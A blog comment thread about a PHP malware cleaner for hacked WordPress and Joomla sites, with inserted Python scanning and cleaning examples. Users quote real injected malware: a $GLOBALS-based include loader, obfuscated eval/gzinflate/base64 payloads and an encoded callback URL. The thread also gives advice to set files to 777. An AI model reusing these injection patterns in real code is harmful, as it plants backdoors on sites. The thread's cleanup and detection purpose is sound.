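              f"conditioned on referrer at lines {[ln for ln, _ in f['conditions']]}")
    print("lines to remove:", lines_to_remove(found))
```

Because Haris and Mark report the rules reappearing within an hour, a clean report from this check only holds until whatever rewrites the file runs again; rerunning it on a schedule and comparing results shows when that happens.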

  50. This script is working very well. Thank you Paolo you saved me.

  51. jm says:

    can we run this script from a web browser?

  52. Pingback: Tired of hackers « MichaelKerley.net

  53. dewluca says:

    I ran the browser version on a couple of sites a few days ago and it worked great!
    Unfortunately, I ran into time-out problems on my main site, so today I tried running from terminal ssh. After a while I was worried it wasn’t working, so I aborted . . . and when I checked the cleaner_log all I see is a list of folders (not the list of files I got when I ran the browser version). And they were folders in the NEW WP install I thought was clean! . . . it never got to the .old and .HACKED folders where I know there are problems.
    Is this just a list of what it checked (rather than what it fixed)?
    If I let it run will I get a list of what it fixed?
    or is there a way to run it on specific subfolders?
    Thanks for your great work!

    • Paolo says:

      Hello Dewluca,

      The CLI version is faster than the browser version of the cleaner; that’s the difference. The list of directories that were in cleaner_log are directories that were visited/checked by the cleaner script. If the cleaner saw a malware / malicious script in a certain file it will list that file in cleaner_log.

      You can run the cleaner on a certain directory just by placing the cleaner file in that directory. For example, /www/php-beginners.com/wp-content/cleaner_2.4.php will scan all the files inside the /www/php-beginners.com/wp-content/ directory and then clean those files that have malware/malicious codes.

      Thanks for using the cleaner script. Just let me know if you still have problems. Thanks.

      Paolo

  54. Alex says:

    Is this script specific to wordpress? I have a bunch of concrete5 sites and a zen cart site that has been infected by the same hack.

    • Paolo says:

      Hello Alex,

      This works well on all PHP programs. WordPress, Joomla, Magento, and etc…
      But don’t forget to backup your files first before running the cleaner.

      Let me know how it goes. Thanks.

      Paolo

  55. Kelly says:

    I’m so happy I found this. I am having the same issue (WordPress!) I could not get the cleaner script to run in my browser (kept getting a 500 error), but I dusted off my DOS skills and ran in PuTTY. Now I have a log, but I have no idea what it means…it looks like all the files it cleaned were in an old WP folder that shouldn’t be accessed by more current site. Any thoughts?

  56. Heya i am for the primary time here. I came across this board and I to find It truly useful & it helped me out a lot. I’m hoping to provide something again and aid others like you aided me.

  57. Mark says:

    Hey Paulo,

    So glad I found your site. One of our WordPress sites got hacked just over a week ago, it was redirecting to another site. I noticed that the file on our server had been modified and inserted with some base64 code, so I went through and replaced all the files with ones from my last back up. We also changed all passwords etc but were still getting the problem.

    Anyway I ran your cleaner script and it found a load of files I’d missed and thankfully it’s all fixed now, thank you so much. I’ve now gone back and made sure our WordPress and Plugins are now fully up-to-date and that we have strong passwords.

    thanks again :)

    • Paolo says:

      Hello Mark, Awesome, thanks. I’m glad that it worked well for you. Please do create a backup of your clean files.

      Have a great day!

      Paolo :)

  58. dobol says:

    Hi…
    Mine got infected as well. I tried to find the culprit by decoding the gzinflate, and finally got this code

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Do you guys know what this code is intended to do?

    • Paolo says:

      Hello Dobol,

      That malware simply calls another file to execute.
      /home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php

      I think you have a TinyMCE vulnerability issue. hmmm.. but I’m not really sure yet.
      Can you send me the infected file (where the eval(gzinflate(…)) code is in) and ../inlinepopups/skins/clearlooks2/img/ec5.php

      I’ll check them, and see what I can do.

      Thanks.

      Paolo :)

  59. dobol says:

    Hi Paolo..
    Thanks for your response,
    Here is the links to the files
    http://www.mediafire.com/download.php?c2k1xj425oqcjo3

    both ec5.php, the decrypted ec5.php and the infected file.

  60. Jay says:

    Thanks tons!! I ran this on a clients site which has an enormous file volume. In the end there were 20k compromised files inspected and cleared. Life saver status Kudos to you!!

  61. Pingback: Hacked! » manyhighways

  62. Hello Paolo! I admire how you help people in trouble like me.

    Could you tell me what this script did to one of my sites: http://pastebin.com/AVfc8rt0

    I used some online tools to decrypt some parts (and found some chmod’s there) but not sure of all. I cleaned (as far as I know) the site but want to know if the database was compromised.

    Thanks in advance!

  63. E says:

    My site is showing up a nasty “cialas” message as the description of my site in Google SERPs. Needless to say, this is not the description seen when you simply key in the site and go there. I thought the problem might be some sort of malware, so I ran cleaner 2.5 on my site and came up clean. Does this mean I can now eliminate malware as the source of the problem? Any ideas on what is causing this?

  64. Jawad says:

    Hi Paolo,

    Just today I have found that my server is all messed up with this eval(base64_decode trojan. I have tried to run your scanner (http://utilisbpo.info/cleaner_2.5.php) but it’s giving an error page. Can you please look into it? I have lot of sites of my clients hosted here.

    Thanks and regards,
    Jawad Khan

    eTek Studio
    http://www.etekstudio.com
    845-704-1900

    • Paolo says:

      Hello Jawad,

      Oh! you need to remove that immediately.
      Can you run it using the Shell terminal?

      I tried running the cleaner:
      http://www.utilisbpo.info/cleaner_2.5.php

      but it didn’t give me an error. It’s loading…
      Just wait until it finishes scanning all the files,
      don’t close the browser. When it finishes loading
      please send me the result.

      But I would suggest running this on the shell terminal or the
      CLI cleaner version because it’s fast.

      Also, please don’t forget to backup your files.

      Let me know.

      Paolo

      • Jawad says:

        WOW, what a quick response. Really impressive.

        How to use shell terminal? I am not a developer.

        I have removed the file as you advised. When it was uploaded, it was showing some results (maybe 500-1000 files). But after a few minutes, it was giving an error message.

        Best regards,
        Jawad

        • Jawad says:

          From ‘removing that’, were you referring to virus or the file? I have removed the file. Please correct if I am wrong.

          Thanks and regards,
          Jawad Khan

          eTek Studio
          http://www.etekstudio.com
          845-704-1900

          • Paolo says:

            Hello Jawad,

            That’s good! I thought you’re not a developer.
            You don’t need to remove that manually. I was referring
            to use the cleaner script to remove the malware codes.

            But if you removed it and the site is still working well,
            that’s good.
            :)

          • Paolo says:

            I was referring to both of them. Some malicious codes are inserted in 1 file, most of them are inserted inside a normal php file.

            Just run the cleaner script it will do the job.
            :)

          • Jawad says:

            Hi Paolo,

            The script is working fine if I run it folder by folder. But if I put it on root, it’s giving 500 error. I realize that it’s because it has to scan thousands of files so it must be timing out.

            I have unlimited hosting plan through godaddy so this time out is kind of strange.

            Any suggestions? It will take days to clean by going in each folder. Is there any way I can run it through root?

            Thanks and regards,
            Jawad Khan

            eTek Studio
            http://www.etekstudio.com
            845-704-1900

          • Paolo says:

            Hello Jawad,

            I would suggest you use CLI version.

            You can access your server using SSH here’s the
            tutorial for godaddy:
            http://support.godaddy.com/help/article/4942

            If you have problems accessing it, please let me know.

            Thanks.

  65. Ali says:

    Hi Paolo
    My 5 sites have an eval(base64_decode(“etc etc Trojan in every theme index file and more. Dreamhost gave me a list. I found your excellent site and ran your Browser version of the cleaner on a couple of the sites and it worked, which was FANTASTIC:) Thanks so much. There were even more infected files than on Dreamhost’s list. However, this morning I’m back to square one. Could the problem be just that I didn’t do all the sites one after the other? I actually tried to do a couple of sites at a time, but this didn’t appear to work. Can you please advise?

    • Paolo says:

      Hi Ali,

      Yeah! I think the malware script resides on the other sites that you
      haven’t cleaned. Try to run the cleaner on the sites that you never
      cleaned before and then to the other sites. See if it will inject
      the malicious codes again.

      Also, please change your ftp & WP password.

      If problem still persists, run the malware scanner:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html
      send the scan result to info@php-beginners.com

      I’ll try to find the file that is causing the malicious codes to
      keep on coming back.

      Let me know. Thanks.

      Paolo :)

  66. sam lee says:

    Hi,
    500 internal error continues to occur when I execute scanner.php and cleaner.php.
    I ran HTTP version.
    Please Please help me~~

    • Paolo says:

      Hi Sam,

      Did you run them together at the same time? That’s not advisable
      especially on HTTP version.

      500 internal error is really very general error type of reporting.
      This means something has gone wrong inside your server, this may be
      because of overload or something, because running scanner or cleaner
      in HTTP version consumes a lot of memory.

      If you still see 500 internal server error. Please contact your
      hosting support.

      I’m gonna be upgrading this so it won’t happen again. Let me know.
      Keep you posted. Thanks.

      Paolo :)

  67. Erik says:

    Hi
    I have the god_mod trojan and it is a pain. The trojan has infected all my .php files. Your script can detect the infected files but can’t clean them. When I look at the file, some extra code (uuencoded) is added on the same row as the starting <?php. Is it possible to make a script that removes the row and adds a new <?php? I use this script at the CLI to detect the trojan (can’t use php cli) or your web script.

    find . -exec grep -l "god_mod" {} \;

    Best Regards
    Erik
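Two things in this thread fit one worked example: Paolo's description (comment 53) of what the cleaner writes to cleaner_log (every directory visited, then each file in which it saw a marker) and Erik's request for a script that drops an infected first row and restores a bare <?php. The following is an added example, not Paolo's cleaner or any code from this page: it walks a directory tree the same way, flags files containing markers quoted in this thread (eval over base64_decode or gzinflate, the god_mod string, the $GLOBALS['mfsn'] loader dobol posted), and rewrites only the exact shape Erik describes, keeping a .bak of the original. The marker list, file extensions and demo tree are constructed assumptions.

```python
import os
import re
from dataclasses import dataclass, field

# Markers quoted in this thread (constructed list, not the cleaner's own
# signature set).
INJECTION_MARKERS = [
    re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate)\s*\("),
    re.compile(r"god_mod"),
    re.compile(r"\$GLOBALS\[['\"]mfsn['\"]\]"),
]

# First row of the file: "<?php", then one complete injected statement, then
# optionally "?>" and nothing else.  Only this shape is rewritten.
FIRST_ROW_INJECTION = re.compile(
    r"^<\?php\s*(?:/\*.*?\*/\s*)?(?P<payload>.+?;)\s*(?:\?>)?\s*$"
)


def is_infected(text: str) -> bool:
    """True when any known injection marker appears in the file text."""
    return any(m.search(text) for m in INJECTION_MARKERS)


def clean_source(text: str):
    """Return (cleaned_text, removed_payload).

    Handles exactly the case Erik describes: injected code sharing the row
    with the opening "<?php".  That row becomes a bare "<?php"; every other
    line is left untouched.  Files infected in any other way come back
    unchanged with removed_payload=None so the caller reports them instead
    of guessing.
    """
    lines = text.split("\n")
    m = FIRST_ROW_INJECTION.match(lines[0])
    if m and is_infected(m.group("payload")):
        lines[0] = "<?php"
        return "\n".join(lines), m.group("payload")
    return text, None


@dataclass
class ScanReport:
    visited_dirs: list = field(default_factory=list)    # the directory lines of cleaner_log
    infected_files: list = field(default_factory=list)  # files carrying a marker
    cleaned_files: list = field(default_factory=list)   # files actually rewritten


def scan_tree(root: str, clean: bool = False, log=None) -> ScanReport:
    """Walk root the way the cleaner does: record every directory visited and
    every file carrying a marker.  With clean=True, rewrite files whose first
    row matches, keeping the original beside them as <name>.bak."""
    report = ScanReport()
    for dirpath, _dirs, filenames in os.walk(root):
        report.visited_dirs.append(dirpath)
        if log:
            print(f"checking {dirpath}", file=log)
        for name in filenames:
            if not name.endswith((".php", ".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 round-trips every byte, so untouched lines are written
            # back exactly as they were read.
            with open(path, encoding="latin-1") as fh:
                text = fh.read()
            if not is_infected(text):
                continue
            report.infected_files.append(path)
            if log:
                print(f"infected {path}", file=log)
            if not clean:
                continue
            cleaned, payload = clean_source(text)
            if payload is None:
                continue  # marker present, but not in the handled first-row form
            with open(path + ".bak", "w", encoding="latin-1") as fh:
                fh.write(text)
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(cleaned)
            report.cleaned_files.append(path)
    return report


if __name__ == "__main__":
    # Constructed demo tree: one file infected on its first row, one clean file.
    import sys
    import tempfile

    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "themes"))
        with open(os.path.join(root, "wp-content", "themes", "index.php"), "w") as fh:
            fh.write('<?php eval(base64_decode("aGVsbG8=")); ?>\nget_header();\n')
        with open(os.path.join(root, "wp-config.php"), "w") as fh:
            fh.write("<?php\ndefine('DB_NAME', 'wp');\n")
        report = scan_tree(root, clean=True, log=sys.stderr)
        print("infected:", report.infected_files)
        print("cleaned:", report.cleaned_files)
```

A file that is reported but not cleaned (payload spanning several rows, or a marker elsewhere in the file) is the case to inspect by hand, and as Paolo repeats throughout the thread, a backup of the tree should exist before running with clean=True.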

  68. sam lee says:

    Hi,

    I have cleaned two sites through ssh version.
    and I requested review to google. but rejected.

    Can you solve it after you check the log file I scanned?
    Let me know your email address.
    Thanks.

  69. sam lee says:

    Yes, I have cleaned my site using your tool (SSH version) and then I requested a review from Google.
    But it was rejected by Google.
    I will send you the scan log files (2 sites).
    Thanks.

  70. sam lee says:

    I sent you the scan and clean logs.
    I want to be out of Google’s blacklist ^^
    Thanks.

  71. John says:

    This is a real basic question. Where do I enter the shell script? In cPanel or on a local app that connects with my ftp. My blue host account was recently attacked and I did all the fixes manually and spent a few days fixing everything. I’ve read about using shell scripts but wasn’t sure where to input the code. I’m on a Mac using Lion if that means anything.

    Thanks for your help!

    John

  72. Peter says:

    Thank you for this code. I’ve cleaned a complete Joomla installation. It was the second time that the malware infected all the php’s.

    Best Regards from Germany
    Peter

    • Paolo says:

      Thank you Peter. :) I’m glad that the script helped you clean your site back again.
      Please do change your ftp and wp passwords and secure a backup of your clean files and db.

      Have a great day!

      Paolo :)

  73. John says:

    Thanks Paolo for your help! I was able to set up SSH for my account so I’m ready for action. I hope I never have to use it. But while I was at it I started using SFTP via the Transmit FTP app and the performance is so much faster than using regular FTP. SFTP uses a secure port so it doesn’t have to negotiate a port number each time there is a request. Also with SFTP I’m now able to change directory and file permissions… I couldn’t do that using plain old FTP.

    Thanks!

    John

    • Paolo says:

      Wow, that’s really helpful information, John. Thanks for sharing it. :)
      SFTP is really a secure one. Thanks again John. Have a great day!

  74. Pingback: Automated Fix for WordPress base64_decode Injection in PHP Files « Blog de xkortazar

  75. Eric says:

    Hi, my site has been infected with the code below. This code is inserted in 30 or 40 php and html files. I have to remove it every 2 or 3 days and it constantly reappears. I ran your Cleaner and presently I don’t have any infected files but I know they will keep coming.

    I have changed my WordPress and ftp passwords.

    Many thanks for your help,
    Eric

    The code:

    #d93065#
    echo(gzinflate(base64_decode("tVVNc9owEP0r………………aTx2nE4Mvo1VdZHr5G2d339mL9Cw==")));
    #/d93065#

    • John says:

      You have to find the culprit… the files that are generating the malware code. Compare with a healthy WordPress site by downloading the latest WP version and compare all the files and folders/directories. Usually the malware will add extra files/folders inside the wp-content directory. Naming will look like it belongs but once you compare sites you’ll see what doesn’t match. Also check all the index.php and .htaccess files for code that doesn’t belong… I found a .htaccess file in my root directory that was generating malware. Also change the file permissions to 444 on .htaccess and index.php files.

      • Eric says:

        Hi,

        The same code keeps coming, but now it’s every day and only on my index.html in the root.
        I checked the folders with Ultra Compare and did not find any extra files except for all the plug-ins. There are a lot of files which are not like the original but I don’t know what to look for.

        This is my .htaccess file in the root. I don’t know if there’s a malicious code.

        # For security reasons, Option all cannot be overridden.
        #Options All -Indexes
        Options ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch -Indexes

        AddType text/cache-manifest .manifest

        AddType video/ogg .ogv
        AddType video/mp4 .mp4
        AddType video/webm .webm

        SetEnvIfNoCase Request_URI \.(og[gav]|mp4|m4a|webm)$ no-gzip dont-vary
        # BEGIN WordPress

        RewriteEngine On
        RewriteBase /
        RewriteRule ^index\.php$ - [L]
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteRule . /index.php [L]

        # END WordPress

        Many thanks for help,
        Eric
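
John's advice above (compare the site against a fresh download of the same WordPress version and look for files that do not belong) can be automated. The following is an added example, not Paolo's scanner and not something John posted: it hashes every file in a clean tree and in the site tree and reports files the site has that the clean copy lacks, files whose content differs, and files that are missing. The trees and paths in `demo()` are constructed placeholders.

```python
"""Diff a live site tree against a pristine copy of the same CMS release.

Added example, not part of Paolo's toolkit. It automates John's suggestion:
hash every file in a clean download and in the site, then list files the
site has that the clean copy lacks, files whose content differs, and files
that are missing. Paths in demo() are constructed placeholders.
"""
from __future__ import annotations

import hashlib
import os
import shutil
import tempfile


def manifest(root: str) -> dict[str, str]:
    """Map relative path -> SHA-256 of content for every file under root."""
    out: dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            out[rel] = digest.hexdigest()
    return out


def compare_trees(clean_root: str, site_root: str) -> dict[str, list[str]]:
    """Return {"added": [...], "modified": [...], "missing": [...]}.

    "added" is where dropped-in files usually show up (wp-content, uploads);
    "modified" catches core files with a payload appended; "missing" flags
    core files that were deleted or renamed. Site-specific files such as
    wp-config.php legitimately appear under "added" and still deserve a look.
    """
    clean, site = manifest(clean_root), manifest(site_root)
    return {
        "added": sorted(p for p in site if p not in clean),
        "modified": sorted(p for p in site if p in clean and site[p] != clean[p]),
        "missing": sorted(p for p in clean if p not in site),
    }


def _write(root: str, rel: str, body: str) -> None:
    """Create rel under root (with parent directories) holding body."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)


def demo() -> dict[str, list[str]]:
    """Constructed clean tree vs. a site copy with one edited and one extra file."""
    base = tempfile.mkdtemp()
    try:
        clean, site = os.path.join(base, "clean"), os.path.join(base, "site")
        core = {  # stand-ins for core files, not real WordPress content
            "index.php": "<?php\nrequire 'wp-blog-header.php';\n",
            "wp-includes/version.php": "<?php\n$wp_version = 'x.y';\n",
        }
        for rel, body in core.items():
            _write(clean, rel, body)
            _write(site, rel, body)
        # site-only differences: a line appended to index.php and a PHP file
        # dropped into uploads (both constructed, dummy payload)
        _write(site, "index.php", core["index.php"] + 'eval(base64_decode("QUFB"));\n')
        _write(site, "wp-content/uploads/cache.php", "<?php /* dropped in */\n")
        return compare_trees(clean, site)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Themes, plugins and uploads are not in the clean download, so they all land under "added"; the useful filter there is any `.php` file under `wp-content/uploads`, which should never exist on a normal install.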

  76. Angelos says:

    Thank you !!

  77. Eric says:

    Thank you, I’ll try that.

  78. Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips

  79. I copied the script to my server. Here’s the link http://Pulkit.me/scanner.php (or cleaner.php)

    It, however, keeps on running. What should I do?

  80. Carlos says:

    Thanks for your work and for sharing it, Paolo. Does this script work too for malware that seems to use some kind of fake “botanalitics” in WordPress installations? It injects php files with code that includes:

    base64_decode('aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==')

    which decodes to http://botstatisticupdate.com/stat/stat.php

    As I say, I think I’ve deleted all of the infected portions since they were on files changed on the very same date and time, so I think I could locate them all, but I am not sure what was the security flaw yet so I’m afraid it might reproduce itself… and a script for automatic elimination in the meantime might come in handy.

    • MYC says:

      I came across the
      base64_decode('aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==')
      intrusion as well. In my case they got in via FTP. I sometimes use NetDrive for FTPing. I look after a bunch of VPS’s and shared web accounts. But only the accounts I had set up in NetDrive were compromised. The other VPS’s and shared web accounts were not touched, but all the ones I had set up login details for in NetDrive were.

      They must have got a sniffer on my local PC.

    • MYC says:

      I had to add a new regex to the cleaner-cli script to pick out this attack:

      $aPattern = array(
      ""
      );

      I’m sure there is a much better regex string, but this did the trick for me.

      The injected code I was trying to match and remove:

      And thanks Paolo. My servers are clean again thanks to you.

  81. Ryan says:

    How long does the script take to run? And how do I know if it has worked? I’m fairly new at this, but have several sites that got hacked and are taking my visitors to porn.
    Thanks!

    • Paolo says:

      Wew, it takes 10-20 min on a typical WordPress installation, Ryan.
      If you have lots of php files that would really take time.

      Are you using CLI version? Let me know.

  82. Thanks for your cleaner... I really appreciate your work.
    What can the regex be for this:

  83. I tried to paste the malware code but it’s not being saved. I saw you are using an array for the patterns to find. I have a few issues here, and I need the regex for that pattern.

    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn...?>

  84. Cinema News says:

    Gr8 post Paolo, very useful to cleanup my blogs. Thank you so much :)

  85. tthdoc says:

    Paolo,

    I have been attacked by the base64_decode hack and read through this blog and was going to try this route. So the first thing I did was upload your cleaner and scanner files to my server root directory. Next I opened PuTTY. I copied your code for the scanner into the command line and got the following result.

    tail: cannot open `scanner_log’ for reading: No such file or directory
    tail: no files remaining

    This is my first time using shell access, so thanks for any suggestions…

    Doc

    • tthdoc says:

      I spoke with bluehost and was able to fix the problem. I had to change directory to public_html and now it is running. I know this was asked before as to time, and read that 10-20 minutes for a typical WP installation. I have 4 domains hosted on my site, with a lot of php files. So how long should I give it to run before you would consider it too long? I was running it before and it stopped and said terminated. I was attributing (right or wrong) this to the fact that I had copied a file from one location to the other on the server while it was running. So I started it again. How long should I let it run … 1 hr, 12 hrs, more?

      Thanks,
      Doc

      • Paolo says:

        A typical WordPress installation would normally take up to 10 – 15 mins. The more php files you have the longer the script runs. :)

      • Carlos says:

        Just in case, I was hacked on bluehost + wordpress too (on April 30th). Bluehost denies all responsibility and I believe them, but I haven’t found the original vulnerability in WordPress/plugins yet. I don’t know if your problem was the same as mine (see above). Maybe it would help to find a pattern (hosting provider, cms, plugins…).

        Speaking of everything, since I never got an answer to my question from Paolo (I wanted to know whether his script scans also for the specific infection I found or not), I ended up signing up for a paid premium service that scanned my site for malware, mysql injections, etc., and according to them, there were no more vulnerabilities or additional backdoors… and even though I haven’t changed/updated anything (everything was already updated in the first place) I haven’t been hacked again, so I’m really at a loss about what happened ???

        • Paolo says:

          Hello Carlos,

          Hackers nowadays are really pretty clever:

          1. they log in to your server using vulnerability scripts
          2. if you log in to your server using ftp from an infected computer – they can get in as well.
          3. brute force attack
          4. Hosting/Shared server is infected
          5. phishing attack
          6. XSS attack
          7. and a lot more…

          I’m not really sure how they got into your server. The only advice I can
          give to you now is:

          1. create a strong password for both your ftp and wordpress accounts.
          2. update your software
          3. if you think your computer is infected. Please do clean it up.
          4. Create a clean backup – because we don’t know when they are
          going to attack again.

          We cannot stop the attacks because they keep creating and improving
          their ways to hack; the only thing we can do for now is to prepare
          ourselves for when that day happens.

          You can test my malware scanner:
          http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

          It scans most malware signatures that I know, but if you think that my scanner
          cannot detect the malware that’s in your site, please don’t hesitate to send it
          to me at info@php-beginners.com and I’ll create a way to detect it.

          I hope that helps.

          Have a great day!

          • Carlos says:

            Oh, thanks for your answer Paolo. Yes, I thought of everything you say, but it’s good to check that list again… In fact I think I’m going to make my password even stronger (I already changed it, but I’m going to change it again to a more complex one).

            I don’t think I had a virus on my desktop but yes, just in case, I even re-formatted my PC and reinstalled Windows, and of course changed my password. I’ve updated my antivirus to a full internet security suite (norton) just in case. I’ve stopped logging in to my control panel from my smartphone just in case the password was stolen through it. I have done all kinds of paranoid things but haven’t been able to find anything out of the ordinary.

            Of course I might be wrong but I think I have ruled out all the possible causes, and if I had to bet, my money would be on some insecure script/plugin on my WP installation. Also, it has to be something easily “scanned”, since I think I was attacked just because I was detected as vulnerable.

            Anyway. I’m sending you my old infected index.php file just in case. Maybe your script already detects it, I couldn’t really check because I had already removed it from the server when I uploaded your scanner, and I don’t want to put the file on the server again just to run the test, to minimise risks.

            Again thanks a lot for your time answering my question and again thanks for sharing your work and expertise.

  86. Norm says:

    I ran the .php file but I’m not really sure what I’m looking at. Could you take a look at the returned results and tell me what the next step is. I thought it would remove the code from the infected files but I’m not sure I’m using it right. http://vtm-dlp.com/wordpress/cleaner_2.8.php

    Thanks

    • Paolo says:

      Hello Norm,

      I ran the cleaner on your site and it has a warning:
      ————————————————————
      Warning: fopen(./wp-mail.php) [function.fopen]: failed to open stream: Permission denied in /home/content/n/o/r/normsfields/html/VTM/wordpress/cleaner_2.8.php on line 206
      ————————————————————

      Can you change the cleaner’s permissions to 777 and run the cleaner again?

      Let me know. Thank you.

  87. Pingback: Blog got hacked, how to fix it at live@haliluya

  88. Appears to have worked on my Joomla site as well! Many thanks!
    CH

  89. Let me first say “thanks” and “congrats” on a great piece of software.

    After I ran it, when I attempt to go to saac-arts.org from Google.com, it returns me to Google.com, with Russian links at the top, and “An unknown error” in the Search Bar.

    I have also run it on “HealthWorksFitnessCenter.com” with the same results.

    Thanks,
    CH

  90. Now, after running cleaner_2.8 on HealthWorksFitnessCenter.com it redirects to the regular Google.com site.

  91. Pingback: VeryBig.org » Recent WordPress Hack Attack (including eval base64decode) Resolved

  92. Aaron says:

    Hi,

    I’m getting a 500 and 404 error using html scanner on Dreamhost. I do not have shell access.

    Anything I may try?

    Thank you!

    Aaron

    “500 Internal Server Error

    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, webmaster@ and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”

  93. Denea says:

    Hi,

    I think the program worked.. it’s created a cleaner log file… but how do you know when it’s finished running? And do I need to do anything with the cleaner log file? Are the viruses still there or did it clean them permanently?

    Thanks again

  94. Victòria Peñafiel says:

    Hi Paolo,

    Been here once already and made a donation. I’ve recently ran your cleaner script again (unlucky me!).

    Anyway, this is just a short note to say THANK YOU for keeping the script up to date. I’m sure you’re helping dozens of people in trouble like me.

    • Paolo says:

      Yes, thank you for your donation before, Victoria. I’m always updating the script.
      Well, I’ll just keep you posted. Hope you’ll not be attacked again.

      I checked your site and it’s really a very good looking site and unique. :)

      Thanks again.

  95. Greg says:

    Hi Paolo,

    I seem to have picked up a nasty script which has been added to every .php file in my hosting account. It has appended this at the top of each index.php file:
    ""; echo "";

    Do you think you could send me an e-mail if you are able to create me a script which can clean this up? I will make a donation of course! :)

    Thanks,
    Greg

  96. Pingback: New Panda/Penguin Update Deciphered? | The Hoist | An SEO Link Building Service For Everyone

  97. Faheem says:

    Hello Dear Admin, I am getting a base64 code virus in all my php files, and also all the js and dev.js files have [x73/63/…. (something like that) at the end of every js file. Please do let me know any way through which I can delete these two codes from all my wordpress files.
    Thanks
    Please email me the tip as well as any script for this.

  98. RW says:

    I have been infected by malware on all of my sites. I’ve tried installing the cleaner_2.9.php on my server and it redirects to another link or nothing happens. What am I doing wrong?

  99. RW says:

    I can’t tell if it’s working or not. Is it just a blank screen for 10-15 mins?

  100. Alberte Zato says:

    Hello Paolo,

    New to this.

    I put the .php on the root and it keeps saying.. “waiting for ibertrainz.eu” ?????

    What Am I doing wrong?

    Thank you,

    Alberte

  101. Alberte Zato says:

    Infection came back. Which is next step? I’ve scanned it with your scanner php script.

    Thank you.

  102. Alberte Zato says:

    Only four index.php files are infected!!!!!!!!!!!!!!!

    4 Found Infected Files

    ./foro2/index.php
    ./foro2/Packages/index.php
    ./foro2/Sources/index.php
    ./downloads/index.php

    It’s a nuisance every 30 minutes or so!

    Any hint, please?

    Thank you.

    Alberte

  103. Kenneth says:

    Hello!

    I think my Joomla sites have been infected. I have tried this cleaner, but it doesn’t seem to fix my problems.
    When I click the link to see the infected files, nothing happens.

    Any advice?

  104. We have used your cleaner script before,
    and it worked fine.
    Now we have a new hacked site, but the cleaner doesn’t work on the infected index file.

    Here is the content of the infected index file.
    It forwards to: sweepstakesandcontestsdo.com

    mark( 'afterLoad' ) : null;

    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication('site');

    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();

    JPluginHelper::importPlugin('system');

    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
    $mainframe->triggerEvent('onAfterInitialise');

    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();

    // authorization
    $Itemid = JRequest::getInt( 'Itemid');
    $mainframe->authorize($Itemid);

    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark('afterRoute') : null;
    $mainframe->triggerEvent('onAfterRoute');

    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd('option');
    $mainframe->dispatch($option);

    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
    $mainframe->triggerEvent('onAfterDispatch');

    /**
    * RENDER THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->render();

    // trigger the onAfterRender events
    JDEBUG ? $_PROFILER->mark('afterRender') : null;
    $mainframe->triggerEvent('onAfterRender');

    /**
    * RETURN THE RESPONSE
    */
    echo JResponse::toString($mainframe->getCfg('gzip'));

  105. Jordi Plana says:

    Hello Paolo,
    Thanks for the cleaner and the scanner it works like a charm!
    I’m hosting my site in hostmonster and every day I have to run the cleaner because I keep getting hacked (eval trojan).
    I updated all timthumb files in every site I have with no luck. I don’t know what to do…
    Can you give some advice on finding the vulnerability?

  106. Gino says:

    Thanks a lot!!!!!! Your script is GREAT and WORKING GREAT!!!
    Solved all my problems. THANKS AGAIN GUYS!!!!

  107. Meysam says:

    Hi Paolo,
    Recently my website’s Joomla client has been infected by a similar malware script. I’m really in an emergency to find a way to fix it. But I’m wondering what I should do?

    http://www.pgforum.net/scanner_2.6.php
    http://www.pgforum.net/cleaner_2.9.php
    Thank you

    • Paolo says:

      Here’s what you should do.

      1. Back up all your joomla files.
      2. Run Malware Scanner
      3. Run Cleaner
      4. Change Joomla and DB password.
      5. Send the scan and cleaner result to me.

      Let me know.

      • Meysam says:

        After running the Cleaner:
        0 Found Infected Files
        but after running the Malware Scanner:
        ./index.php
